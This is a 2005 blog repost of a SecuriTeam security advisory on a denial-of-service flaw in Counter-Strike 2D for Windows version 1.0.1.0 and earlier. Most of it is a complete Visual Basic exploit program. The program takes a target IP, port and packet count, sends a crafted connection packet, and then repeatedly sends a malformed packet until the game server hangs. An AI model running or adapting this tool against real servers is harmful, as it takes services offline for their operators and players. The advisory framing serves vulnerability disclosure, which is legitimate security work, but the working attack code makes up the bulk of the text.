Search This Blog

Tuesday, September 13, 2005

[EXPL] Counter Strike 2D DoS (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Counter Strike 2D DoS (Exploit)
------------------------------------------------------------------------

SUMMARY

" <http://www.cs2d.com/> Counter-Strike 2D is a 2D Clone of the most
famous Multiplayer Game ever: Counter-Strike by Valve Software." By
sending crafted packets will cause Counter Strike 2D to enter to a DoS
condition.

DETAILS

Vulnerable Systems:
* Counter Strike 2D Windows version 1.0.1.0 and prior

By repeating the same packet more then once, Counter Strike 2D will enter
a loop and will stop responding after several sending of the packets .

Exploit:
VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"
Begin VB.Form frmMain
BorderStyle = 4 'Festes Werkzeugfenster
Caption = "CS2D DoS - tHa_imaX"
ClientHeight = 2160
ClientLeft = 45
ClientTop = 315
ClientWidth = 3195
BeginProperty Font
Name = "Verdana"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Icon = "frmMain.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
ScaleHeight = 2160
ScaleWidth = 3195
ShowInTaskbar = 0 'False
StartUpPosition = 3 'Windows-Standard
Begin VB.CommandButton cmdAttack
Caption = "[Attack]"
Height = 285
Left = 45
TabIndex = 9
Top = 1545
Width = 3090
End
Begin VB.Frame Frame1
Caption = "Attack Settings"
Height = 1560
Left = 45
TabIndex = 0
Top = -15
Width = 3105
Begin VB.TextBox txtName
Alignment = 2 'Zentriert
Appearance = 0 '2D
Height = 285
Left = 1305
TabIndex = 8
Text = "jack_lalane"
Top = 1230
Width = 1740
End
Begin VB.TextBox txtPC
Alignment = 2 'Zentriert
Appearance = 0 '2D
Height = 270
Left = 1305
TabIndex = 6
Text = "50"
Top = 810
Width = 1740
End
Begin VB.TextBox txtPort
Alignment = 2 'Zentriert
Appearance = 0 '2D
Height = 285
Left = 1305
TabIndex = 4
Text = "36963"
Top = 510
Width = 1740
End
Begin VB.TextBox txtIP
Alignment = 2 'Zentriert
Appearance = 0 '2D
Height = 285
Left = 1305
TabIndex = 2
Text = "127.0.0.1"
Top = 210
Width = 1740
End
Begin VB.Label Label4
Caption = "Player Name:"
Height = 210
Left = 60
TabIndex = 7
Top = 1260
Width = 1185
End
Begin VB.Label Label3
Caption = "Packet Count:"
Height = 210
Left = 60
TabIndex = 5
Top = 840
Width = 1245
End
Begin VB.Label Label2
Caption = "Server Port:"
Height = 210
Left = 60
TabIndex = 3
Top = 525
Width = 1065
End
Begin VB.Label Label1
Caption = "Server IP:"
Height = 210
Left = 60
TabIndex = 1
Top = 240
Width = 960
End
End
Begin MSWinsockLib.Winsock wS
Left = 2865
Top = -45
_ExtentX = 741
_ExtentY = 741
_Version = 393216
Protocol = 1
End
Begin VB.Label lblS
Caption = "DoS Loaded..."
Height = 255
Left = 45
TabIndex = 10
Top = 1905
Width = 3090
End
End
Attribute VB_Name = "frmMain"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'***WRITTEN BY tHa_imaX [tHa_imaX@yahoo.de]
'***23.08.2005
'***NEED A JOINT NOW ;)

Dim ConnectionPacket As String ' Declare our Connection String
Dim DoSPacket As String ' Declare our DoS Packet
Dim pC As Integer ' Packet Count
Private Sub cmdAttack_Click()
'First we define the Connect Packet
ConnectionPacket = Chr(Val("&hFA")) & Chr(Val("&hFA")) & _
Chr(Val("&h0D")) & Chr(Val("&h0A")) & _
"<name>" & _
Chr(Val("&hCE")) & Chr(Val("&h7B")) & Chr(Val("&hE2")) & _
Chr(Val("&h45")) & Chr(Val("&h63")) & Chr(Val("&h90")) & _
Chr(Val("&h00")) & Chr(Val("&h00"))

'At twice we define our DoS Packet
DoSPacket = Chr(Val("&hFA")) & Chr(Val("&h04")) & _
"<name>" & _
Chr(Val("&h0D")) & Chr(Val("&h0A")) & Chr(Val("&h02"))

'Now we prepare the packets (insert our playername)
ConnectionPacket = Replace(ConnectionPacket, "<name>", txtName.Text)
DoSPacket = Replace(DoSPacket, "<name>", txtName.Text)

'Set the pC to zero
pC = 0

'Lets send the First Packet to tell the server who we are
wS.RemoteHost = txtIP.Text
wS.RemotePort = Val(txtPort.Text)
wS.SendData ConnectionPacket
End Sub

Private Sub wS_DataArrival(ByVal bytesTotal As Long)
On Error Resume Next ' Ignore Errors

'Count the Packets to Cancel the attack after the packetcount value
pC = pC + 1
If pC >= Val(txtPC.Text) Then
lblS.Caption = "Done."
Exit Sub
End If
lblS = "Total Packets: " & pC

'Dim tmp As String
'wS.GetData tmp
'Debug.Print tmp


'Send the DoSPacket if the Server send something=>loop
wS.SendData DoSPacket

'Handle Errors
If Err <> 0 Then
MsgBox Err.Description
pC = Val(txtPC.Text)
End If
End Sub

'EoF

ADDITIONAL INFORMATION

The information has been provided by <mailto:the_imax@yahoo.de> X X.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)